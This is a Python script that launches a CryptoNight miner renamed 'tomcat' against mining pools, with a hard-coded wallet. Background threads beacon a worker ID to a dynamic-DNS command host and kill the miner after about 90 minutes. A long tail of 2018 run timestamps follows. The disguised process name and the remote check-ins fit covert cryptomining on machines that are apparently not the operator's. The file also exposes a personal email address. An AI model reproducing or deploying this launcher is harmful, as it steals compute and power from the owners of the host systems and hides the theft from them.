import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:01.579732
#2018-02-17 16:44:04.159618
#2018-02-17 18:31:03.740456
#2018-02-17 20:19:05.542323
#2018-02-17 22:06:05.003992
#2018-02-17 23:50:08.163486
#2018-02-18 01:40:05.849946
#2018-02-18 03:27:01.436505
#2018-02-18 05:16:02.143700
#2018-02-18 07:08:03.611109
#2018-02-18 08:56:01.688750
#2018-02-18 10:43:04.931991
#2018-02-18 12:28:04.272910
#2018-02-18 14:16:01.362194
#2018-02-18 16:06:06.519725
#2018-02-18 17:54:07.282781
#2018-02-18 19:43:04.195759
#2018-02-18 21:28:03.497962
#2018-02-18 23:17:01.490032
#2018-02-19 01:03:07.185253
#2018-02-19 02:50:09.251322
#2018-02-19 04:36:01.651152
#2018-02-19 06:20:07.555595
#2018-02-19 08:08:03.878541
#2018-02-19 09:58:07.939368
#2018-02-19 11:49:06.481551
#2018-02-19 13:36:05.417696
#2018-02-19 15:25:08.155112
#2018-02-19 17:13:03.911474
#2018-02-19 18:59:06.886681
#2018-02-19 20:45:04.300727
#2018-02-19 22:33:01.478075
#2018-02-20 00:17:04.562491
#2018-02-20 02:05:06.360406
#2018-02-20 03:55:04.215761
#2018-02-20 05:40:09.395522
#2018-02-20 07:24:08.392147
#2018-02-20 09:10:03.202998
#2018-02-20 10:53:04.337343
#2018-02-20 12:39:08.462815
#2018-02-20 14:25:01.415356
#2018-02-20 16:11:05.106164
#2018-02-20 17:56:06.812024
#2018-02-20 19:47:04.393247
#2018-02-20 21:36:07.785099
#2018-02-20 23:18:07.226497
#2018-02-21 01:03:06.368295
#2018-02-21 02:50:08.256400
#2018-02-21 04:37:07.160179
#2018-02-21 06:25:01.308528
#2018-02-21 08:10:07.598539
#2018-02-21 09:57:05.911853
#2018-02-21 11:44:09.594169
#2018-02-21 13:36:04.228193
#2018-02-21 15:20:08.950495
#2018-02-21 17:10:09.815845
#2018-02-21 18:57:10.643201
#2018-02-21 20:45:07.777514
#2018-02-21 22:29:05.828441
#2018-02-22 00:18:05.171432
#2018-02-22 02:07:05.996579
#2018-02-22 03:52:01.443944
#2018-02-22 05:38:08.040305
#2018-02-22 07:23:07.675929
#2018-02-22 09:11:02.415169
#2018-02-22 11:00:01.504578
#2018-02-22 12:47:05.599728
#2018-02-22 14:33:07.078644
#2018-02-22 16:19:01.481007
#2018-02-22 18:05:06.406440
#2018-02-22 19:53:05.306278
#2018-02-22 21:41:06.539577
#2018-02-22 23:31:02.279700
#2018-02-23 01:18:06.559397
#2018-02-23 03:04:05.904146
#2018-02-23 04:49:04.740932
#2018-02-23 06:34:03.691352
#2018-02-23 08:21:05.555856
#2018-02-23 10:37:06.968496
#2018-02-23 12:29:04.571900
#2018-02-23 14:16:06.266401
#2018-02-23 16:06:09.123109
#2018-02-23 17:53:04.251064
#2018-02-23 19:38:09.132114
#2018-02-23 21:21:04.170704
#2018-02-23 23:08:08.297856
#2018-02-24 00:57:04.337924
#2018-02-24 02:52:06.809458
#2018-02-24 04:41:05.334206
#2018-02-24 06:25:08.081080
#2018-02-24 08:13:07.029507
#2018-02-24 09:57:04.825564
#2018-02-24 11:56:04.460803
#2018-02-24 13:44:06.323832
#2018-02-24 15:30:07.521412
#2018-02-24 17:21:01.353011
#2018-02-24 19:10:04.523348
#2018-02-24 20:58:06.140405
#2018-02-24 23:27:01.281360
#2018-02-25 02:50:04.162718
#2018-02-25 06:33:04.694630